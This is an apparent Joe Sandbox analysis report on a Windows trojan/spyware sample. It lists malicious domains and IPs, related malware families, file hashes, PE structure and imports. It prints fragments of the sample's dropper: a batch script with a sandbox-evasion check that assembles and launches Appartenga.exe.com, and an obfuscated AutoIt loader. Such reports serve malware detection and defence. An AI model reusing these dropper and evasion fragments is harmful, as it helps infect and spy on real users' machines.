              C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://gimpimageeditor.com/100%Avira URL Cloudmalware
              http://gimpimageeditor.com:80/100%Avira URL Cloudmalware
              http://gimpimageeditor.comH0%Avira URL Cloudsafe
              http://gimpimageeditor.com100%Avira URL Cloudmalware
              gimpimageeditor.com:80100%Avira URL Cloudmalware
Name                                                         IP             Active   Malicious  Antivirus Detection  Reputation
gimpimageeditor.com                                          76.223.67.189  true     true                            unknown
FUaPHLaTpAPGRbsfxOMdnwBFBsmro.FUaPHLaTpAPGRbsfxOMdnwBFBsmro  unknown        unknown  true                            unknown
Name                         Malicious  Antivirus Detection       Reputation
gimpimageeditor.com:80       true       Avira URL Cloud: malware  unknown
http://gimpimageeditor.com/  true       Avira URL Cloud: malware  unknown
IP             Domain               Country        ASN    ASN Name     Malicious
76.223.67.189  gimpimageeditor.com  United States  16509  AMAZON-02US  true
                                                                                IP
                                                                                127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1593404
Start date and time: 2025-01-17 06:51:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 2YLM6BQ9S3.exe (renamed because the original name is a hash value)
Original Sample Name: 7c86d24bf10f9a6970b3c7c86e455423.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@16/7@2/2
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 97
• Number of non-executed functions: 304
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegAsm.exe, PID 1520, because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing disassembly code
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtQueryValueKey calls found
• Report size getting too big: too many NtReadVirtualMemory calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
00:53:20  API Interceptor  122x Sleep call for process: RegAsm.exe modified
Match: 76.223.67.189
Associated Sample Name / URL  Detection  Threat Name    Context
Payment Advice.exe            malicious  FormBook       www.woodsplace.net/lazq/
9MZZG92yMO.exe                malicious  FormBook       www.infovea.tech/3irn/
1162-201.exe                  malicious  FormBook       www.infovea.tech/s1ai/
236236236.elf                 malicious  Unknown        dubai.degree/
RFQ 3100185 MAHAD.exe         malicious  FormBook       www.mjmegartravel.online/t2sm/
RN# D7521-RN-00353 REV-2.exe  malicious  FormBook       www.mjmegartravel.online/t2sm/
8dPlV2lT8o.exe                malicious  Simda Stealer  qexyhuv.com/login.php
7ObLFE2iMK.exe                malicious  Simda Stealer  qexyhuv.com/login.php
UMwpXhA46R.exe                malicious  Simda Stealer  qexyhuv.com/login.php
1fWgBXPgiT.exe                malicious  Simda Stealer  qexyhuv.com/login.php
Match: gimpimageeditor.com
Associated Sample Name / URL                       Detection  Threat Name  Context
12809F5D40A823049CFB3BDF66332D1929AC49AD7018A.exe  malicious  RedLine      104.21.24.246
zIUj0Dor9a.exe                                     malicious  RedLine      104.21.24.246
Match: AMAZON-02US
Associated Sample Name / URL                                                                                          Detection  Threat Name  Context
New order BPD-003777.exe                                                                                              malicious  FormBook     13.248.169.48
https://vertexagent.tech                                                                                              malicious  Unknown      3.5.146.166
na.elf                                                                                                                malicious  Prometei     54.171.230.55
https://projection13.github.io/sarthak24-amazon-clone/                                                                malicious  HTMLPhisher  3.161.81.121
http://staemcommunnuty.com/gift/activation=Dor5Fhnm2w                                                                 malicious  HTMLPhisher  18.245.46.22
https://raghvendrayadav6997.github.io/Amazon-Clone/                                                                   malicious  HTMLPhisher  13.35.58.101
QuarantineMessage.zip                                                                                                 malicious  Gabagool     65.9.66.56
http://monitor.gaetawindow.com/KL4Qr4780vn131ID883QS381DQ533GD17ES10680Fr92835kb51913eY94206KF83514XE1578052814==    malicious  Phisher      3.128.168.120
na.elf                                                                                                                malicious  Prometei     34.249.145.219
https://polite-sunburst-c957f8.netlify.app                                                                            malicious  Unknown      3.75.10.80
                                                                                No context
Match: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
Associated Sample Name / URL       Detection  Threat Name
8lOT1rXZp5.exe                     malicious  RedLine
c2.hta                             malicious  XWorm
c2.hta                             malicious  XWorm
OR8Ti8rf8h.exe                     malicious  AveMaria, DcRat, StormKitty, VenomRAT
RFQ-004282A.Teknolojileri A.S.exe  malicious  AgentTesla
c2.hta                             malicious  XWorm
c2.hta                             malicious  XWorm
PQwHxAiBGt.exe                     malicious  RHADAMANTHYS
P0J8k3LhVV.exe                     malicious  Nanocore
NIENrB5r6b.exe                     malicious  XWorm

Match: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com
Associated Sample Name / URL                            Detection  Threat Name
sEOELQpFOB.lnk                                          malicious  RedLine
ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk    malicious  RedLine, SectopRAT
payload_1.hta                                           malicious  RedLine
fsg5PWtTm2.lnk                                          malicious  RedLine, SectopRAT
Whatsapp-GUI.exe                                        malicious  DarkGate, MailPassView
Whatsapp-GUI.exe                                        malicious  DarkGate, MailPassView
Agreement for Cooperation.PDF.lnk.download.lnk          malicious  RedLine
malware.zip                                             malicious  Unknown
Dark_drop_2_pers_lum_clean.exe.bin.exe                  malicious  LummaC, DarkGate, LummaC Stealer, MailPassView
Agreement for YouTube cooperation.pdf.lnk.download.lnk  malicious  LummaC
                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):893608
                                                                                                                        Entropy (8bit):6.620131693023677
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                                                                                        MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                        SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                                                                                        SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                                                                                        SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                        Joe Sandbox View:
• Filename: sEOELQpFOB.lnk, Detection: malicious
• Filename: ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk, Detection: malicious
• Filename: payload_1.hta, Detection: malicious
• Filename: fsg5PWtTm2.lnk, Detection: malicious
• Filename: Whatsapp-GUI.exe, Detection: malicious
• Filename: Whatsapp-GUI.exe, Detection: malicious
• Filename: Agreement for Cooperation.PDF.lnk.download.lnk, Detection: malicious
• Filename: malware.zip, Detection: malicious
• Filename: Dark_drop_2_pers_lum_clean.exe.bin.exe, Detection: malicious
• Filename: Agreement for YouTube cooperation.pdf.lnk.download.lnk, Detection: malicious
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Process:C:\Users\user\Desktop\2YLM6BQ9S3.exe
                                                                                                                        File Type:ASCII text, with very long lines (363), with CRLF, CR, LF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):958194
                                                                                                                        Entropy (8bit):5.840150717371117
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:VBSUEM+wS/ecIEBA4xgtQlJeqjCArINBCNBXQ2jq62+CVJUUU1:AHW8
                                                                                                                        MD5:DBCBEC4AA97661B5DA5B1F1A41DD08B1
                                                                                                                        SHA1:A4B743D55D2F73540A5540EC1D8BF3254D8A4BF9
                                                                                                                        SHA-256:957E1A3F22AB7DED970DDF1D7833D8F2CEE98D77C112A8ABEE053200AF2207BE
                                                                                                                        SHA-512:DED06204495E9CC9C907A40B9A15D75D09F00E7B24727C6E45B97D3CA7A64CA0D340113A86309BE146C67EFB1E6A4A64CA6F6330D2F07F89EFF25A022F5D5EF0
                                                                                                                        Malicious:false
                                                                                                                        Preview:Local $GRKTyzN = REYmrhU("75*90*102*85*77*81*102*89*117*70*85*76*87*103*120*107*125*84*82*105*115*124*71*75*71*120*114*119*116",5)..#NoTrayIcon....Func OYrlyFQpmkQCNau($aPb,$ThYk,$fNuWulZv,$Ubnc,$rsOs,$StPfCllr,$BULyZcde,$DtGC,$djMUx)..Local $tVlaEAnEMWulUuosnZMqgkjufNnePdPIeMQPVHQPDnRomavp = 'ccxIMATJrrQwvOcibiodzvRoWvPxtGWsgYxUxqdjXuRDqOiKcwekgTKYEjLfKnFvumMbxBMbQWzjEhoogyZrELrcgcdofwBnBxbBeKfTgExambxdrC'...$mfiZRXNMJJHjzR = 117..$GAsKuZbvmB = 76..While ((8533-8532)*8118)..Switch $mfiZRXNMJJHjzR..Case 110....$FlKhJRiWStIDezp = Execute(REYmrhU("71*117*108*121*104*74*104*119*86*104*117*108*100*111*43*42*72*101*73*74*107*107*82*113*86*118*100*106*116*75*118*102*90*42*44",3)), $KKuAuZxit = 'rfkhbiueaMCSLGBDaHhlOfQtBZStdGjypUcDytRSAgrpFRZAYCGNUUy'..$54 = 135..For $jdmshzfJDaclXtelrVjnnfXJlNhUOSvoaRzfXRljUwKdcWZOebmiiKmXzP = 9 To 22..Local $bfeLLAvJQkYbhPxJ = 'kHmKZayOZmlfPGtZzzDbDsIooogZtaXmlFCRHwbWWXMwjxwETnU'..Local $FlKhJRiWStIDezp = Execute(REYmrhU("86*119*117*108*113*106*76*118*73*11
                                                                                                                        Process:C:\Users\user\Desktop\2YLM6BQ9S3.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):491
                                                                                                                        Entropy (8bit):5.756816586896379
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:TApafzZSfWq8S9BWzZKlY0EwquHFL35v2mPgD00VE40OS90n:Zbk+zw08lY0uulD52mID00Vf0Of
                                                                                                                        MD5:75868819B9DD1508A5BE6F0221936C68
                                                                                                                        SHA1:2E3A918DE2BA31C304163EB23F6AEE5E338A9E0E
                                                                                                                        SHA-256:8513B1F3DF70DF4B610E6BF593FFBDC25BA8AADD6C9A7F8D62322490B41CF863
                                                                                                                        SHA-512:7C17E7449BB6EE4337F9BFFD5436E9FDBDD675DEFBF24B44C160B8B6ED07F7154BC5EFDF2EA364D3ECA94B890277B3FFAB45B19973ADCEDBC1296B4CFEC665F5
                                                                                                                        Malicious:false
                                                                                                                        Preview:Set ZnAryZJennDHBZRKoFEQiclC=DESKTOP-..Set NgVKmsqkDvrmEKBmhxDJDpz=QO5QU33..Set woTBZcmVHBatcStZsRsLCOXeIQpV=MZ..if %userdomain%==%ZnAryZJennDHBZRKoFEQiclC% ping 127.0.0.1 -n 600..<nul set /p = "%woTBZcmVHBatcStZsRsLCOXeIQpV%" > Appartenga.exe.com..findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt >> Appartenga.exe.com"..copy Chirurgo.adt S..start Appartenga.exe.com S..ping 127.0.0.1 -n 30....
                                                                                                                        Process:C:\Users\user\Desktop\2YLM6BQ9S3.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):103816
                                                                                                                        Entropy (8bit):7.998067335695939
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:3072:lGnRzOzeL6RXCWYBE9jPHI/r/Ri5Vbryc:8nRzmeLsCjBE9j/I/k5V/
                                                                                                                        MD5:B2815D6253BFF6941901A21CBE38080F
                                                                                                                        SHA1:3DB449BE920267395592F994CDB31CB89C9BD690
                                                                                                                        SHA-256:A7DA9150D5E0FC2EDC3B97B92794999934D6A55A12A7D1D93C7023524B918DBC
                                                                                                                        SHA-512:C1B44E695620B71753BC285C1299BB3C6DB089EDC6A800726C02853201524ACA79BB8550937B2AD2883384F454814EE29A5D64D7D79EA2A6E3EF420DBC131C10
                                                                                                                        Malicious:false
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com
                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):65440
                                                                                                                        Entropy (8bit):6.049806962480652
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                                                                        MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                        SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                                                                        SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                                                                        SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
• Filename: 8lOT1rXZp5.exe, Detection: malicious
• Filename: c2.hta, Detection: malicious
• Filename: c2.hta, Detection: malicious
• Filename: OR8Ti8rf8h.exe, Detection: malicious
• Filename: RFQ-004282A.Teknolojileri A.S.exe, Detection: malicious
• Filename: c2.hta, Detection: malicious
• Filename: c2.hta, Detection: malicious
• Filename: PQwHxAiBGt.exe, Detection: malicious
• Filename: P0J8k3LhVV.exe, Detection: malicious
• Filename: NIENrB5r6b.exe, Detection: malicious
                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        File Type:ASCII text, with very long lines (363), with CRLF, CR, LF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):958194
                                                                                                                        Entropy (8bit):5.840150717371117
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24576:VBSUEM+wS/ecIEBA4xgtQlJeqjCArINBCNBXQ2jq62+CVJUUU1:AHW8
                                                                                                                        MD5:DBCBEC4AA97661B5DA5B1F1A41DD08B1
                                                                                                                        SHA1:A4B743D55D2F73540A5540EC1D8BF3254D8A4BF9
                                                                                                                        SHA-256:957E1A3F22AB7DED970DDF1D7833D8F2CEE98D77C112A8ABEE053200AF2207BE
                                                                                                                        SHA-512:DED06204495E9CC9C907A40B9A15D75D09F00E7B24727C6E45B97D3CA7A64CA0D340113A86309BE146C67EFB1E6A4A64CA6F6330D2F07F89EFF25A022F5D5EF0
                                                                                                                        Malicious:false
                                                                                                                        Preview:Local $GRKTyzN = REYmrhU("75*90*102*85*77*81*102*89*117*70*85*76*87*103*120*107*125*84*82*105*115*124*71*75*71*120*114*119*116",5)..#NoTrayIcon....Func OYrlyFQpmkQCNau($aPb,$ThYk,$fNuWulZv,$Ubnc,$rsOs,$StPfCllr,$BULyZcde,$DtGC,$djMUx)..Local $tVlaEAnEMWulUuosnZMqgkjufNnePdPIeMQPVHQPDnRomavp = 'ccxIMATJrrQwvOcibiodzvRoWvPxtGWsgYxUxqdjXuRDqOiKcwekgTKYEjLfKnFvumMbxBMbQWzjEhoogyZrELrcgcdofwBnBxbBeKfTgExambxdrC'...$mfiZRXNMJJHjzR = 117..$GAsKuZbvmB = 76..While ((8533-8532)*8118)..Switch $mfiZRXNMJJHjzR..Case 110....$FlKhJRiWStIDezp = Execute(REYmrhU("71*117*108*121*104*74*104*119*86*104*117*108*100*111*43*42*72*101*73*74*107*107*82*113*86*118*100*106*116*75*118*102*90*42*44",3)), $KKuAuZxit = 'rfkhbiueaMCSLGBDaHhlOfQtBZStdGjypUcDytRSAgrpFRZAYCGNUUy'..$54 = 135..For $jdmshzfJDaclXtelrVjnnfXJlNhUOSvoaRzfXRljUwKdcWZOebmiiKmXzP = 9 To 22..Local $bfeLLAvJQkYbhPxJ = 'kHmKZayOZmlfPGtZzzDbDsIooogZtaXmlFCRHwbWWXMwjxwETnU'..Local $FlKhJRiWStIDezp = Execute(REYmrhU("86*119*117*108*113*106*76*118*73*11
                                                                                                                        Process:C:\Users\user\Desktop\2YLM6BQ9S3.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):893726
                                                                                                                        Entropy (8bit):6.620361902406828
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:qdpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:ST3E53Myyzl0hMf1tr7Caw8M01
                                                                                                                        MD5:1BB95270DEFCAFF91782A987B93DA148
                                                                                                                        SHA1:C83E1F00A4B9F6C0111A870A1C1532EAB909DE5F
                                                                                                                        SHA-256:D2D3BF721D6C6838F120A394B045F8F40A3995E83911A9B7E4DA19591AE7097E
                                                                                                                        SHA-512:E97EB879CF057F67E28AF43C0547C91F54C4B340FFEA1E75C33189FD4553980EC68B90158949F074EF1ED4CA19E2646CDDD294D376A952A052155155FAB871CA
                                                                                                                        Malicious:false
                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):7.887779819641419
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:2YLM6BQ9S3.exe
                                                                                                                        File size:1'721'467 bytes
                                                                                                                        MD5:7c86d24bf10f9a6970b3c7c86e455423
                                                                                                                        SHA1:390d4d70d950a0e0f1a2744296e841bf70024b8d
                                                                                                                        SHA256:128985f1be0a64f43674e4e287eda262713c5bc3288582d97d1463b15d2d35f7
                                                                                                                        SHA512:2ed282b054d77a4a38f57a1e95b3ed87d651a47c4ee4dac0185901cf9dfb024710dfd8fb48d2dfba19ef9462715866ac5bcf84c22712889d9099b671efc5cf7d
                                                                                                                        SSDEEP:49152:DAd13wMCDhEwBfmK4ie7SiAeOh2NmV8Xo1:DAd131eENDiPhIho1
                                                                                                                        TLSH:A98502A1F2DC84F5F0B768B288F39D7295F7657C9498042B629CB6366BF1342403EB16
                                                                                                                        File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L......L.................(...........-.......@....@..................................r.......................................b...........H.................
                                                                                                                        Icon Hash:3270a28b89efbab6
                                                                                                                        Entrypoint:0x412daf
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:
                                                                                                                        Time Stamp:0x4CF4C71C [Tue Nov 30 09:42:52 2010 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:a011f8d93026fd9f5e9442faeeff606d
                                                                                                                        Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00415E28h
push 00412F40h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [004141DCh]
pop ecx
or dword ptr [0041A9A4h], FFFFFFFFh
or dword ptr [0041A9A8h], FFFFFFFFh
call dword ptr [004141E0h]
mov ecx, dword ptr [0041899Ch]
mov dword ptr [eax], ecx
call dword ptr [004141E4h]
mov ecx, dword ptr [00418998h]
mov dword ptr [eax], ecx
mov eax, dword ptr [004141E8h]
mov eax, dword ptr [eax]
mov dword ptr [0041A9A0h], eax
call 00007FDC60B70ED2h
cmp dword ptr [00418770h], ebx
jne 00007FDC60B70DBEh
push 00412F38h
call dword ptr [004141ECh]
pop ecx
call 00007FDC60B70EA4h
push 0041804Ch
push 00418048h
call 00007FDC60B70E8Fh
mov eax, dword ptr [00418994h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00418990h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004141F4h]
push 00418044h
push 00418000h
call 00007FDC60B70E5Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x162b4 | 0xc8 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1b000 | 0xc4804 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x14000 | 0x364 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x12660 | 0x12800 | 73c0b500124224d847fc87e6472c46c4 | False | 0.609375 | data | 6.599820247935802 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x14000 | 0x34f0 | 0x3600 | 5b64bb0d022e45bbd4add5c7ca6ebea5 | False | 0.43287037037037035 | data | 5.4864421902497895 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x18000 | 0x29ac | 0x800 | ca238ab0a3cf0e4f5d787bc3bc113d57 | False | 0.45263671875 | data | 3.828802525078782 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1b000 | 0xc4804 | 0xc4a00 | 11b22758df36b899352052fa19e2231a | False | 0.8478151819771138 | data | 7.738025797009467 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
TXT | 0x1b510 | 0xc280 | data | English | United States | 1.0005221722365039
TXT | 0x27790 | 0x1a498 | data | English | United States | 1.0003807860910914
RT_ICON | 0x41c28 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.18670886075949367
RT_ICON | 0x52450 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.28694555392053817
RT_ICON | 0x5b8f8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.32042513863216265
RT_ICON | 0x60d80 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.29080066131317905
RT_ICON | 0x64fa8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.379149377593361
RT_ICON | 0x67550 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4294090056285178
RT_ICON | 0x685f8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5405737704918033
RT_ICON | 0x68f80 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6152482269503546
RT_DIALOG | 0x693e8 | 0x1be | data | English | United States | 0.5650224215246636
RT_DIALOG | 0x695a8 | 0x2e0 | data | English | United States | 0.43478260869565216
RT_DIALOG | 0x69888 | 0x120 | data | English | United States | 0.5138888888888888
RT_DIALOG | 0x699a8 | 0xf8 | data | English | United States | 0.6290322580645161
RT_DIALOG | 0x69aa0 | 0x1bc | data | English | United States | 0.5112612612612613
RT_DIALOG | 0x69c5c | 0x61a | data | English | United States | 0.41613316261203587
RT_DIALOG | 0x6a278 | 0xd2 | data | English | United States | 0.6571428571428571
RT_RCDATA | 0x6a34c | 0x249e7 | data | English | United States | 1.0003733557346774
RT_RCDATA | 0x8ed34 | 0x2d6dc | data | English | United States | 1.0003546937810357
RT_RCDATA | 0xbc410 | 0x22de6 | data | English | United States | 1.0003570878436094
RT_GROUP_ICON | 0xdf1f8 | 0x76 | data | English | United States | 0.7542372881355932
RT_VERSION | 0xdf270 | 0x24c | data | English | United States | 0.4931972789115646
RT_MANIFEST | 0xdf4bc | 0x346 | ASCII text, with CRLF line terminators | English | United States | 0.5083532219570406
DLL | Import
COMCTL32.dll |
SHELL32.dll | SHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
GDI32.dll | CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll | FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll | ReleaseDC, CopyImage, GetParent, GetWindowRect, wsprintfA, CreateWindowExW, SetTimer, GetWindowDC, DispatchMessageW, KillTimer, DestroyWindow, CharUpperW, EndDialog, SendMessageW, wsprintfW, SetWindowPos, GetMenu, GetWindowLongW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetMessageW, SetWindowTextW, MessageBoxA, GetKeyState, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, GetSysColor, ScreenToClient
ole32.dll | CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll | SysAllocString, VariantClear, OleLoadPicture
KERNEL32.dll | SetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, SetEnvironmentVariableW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, ResumeThread, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, 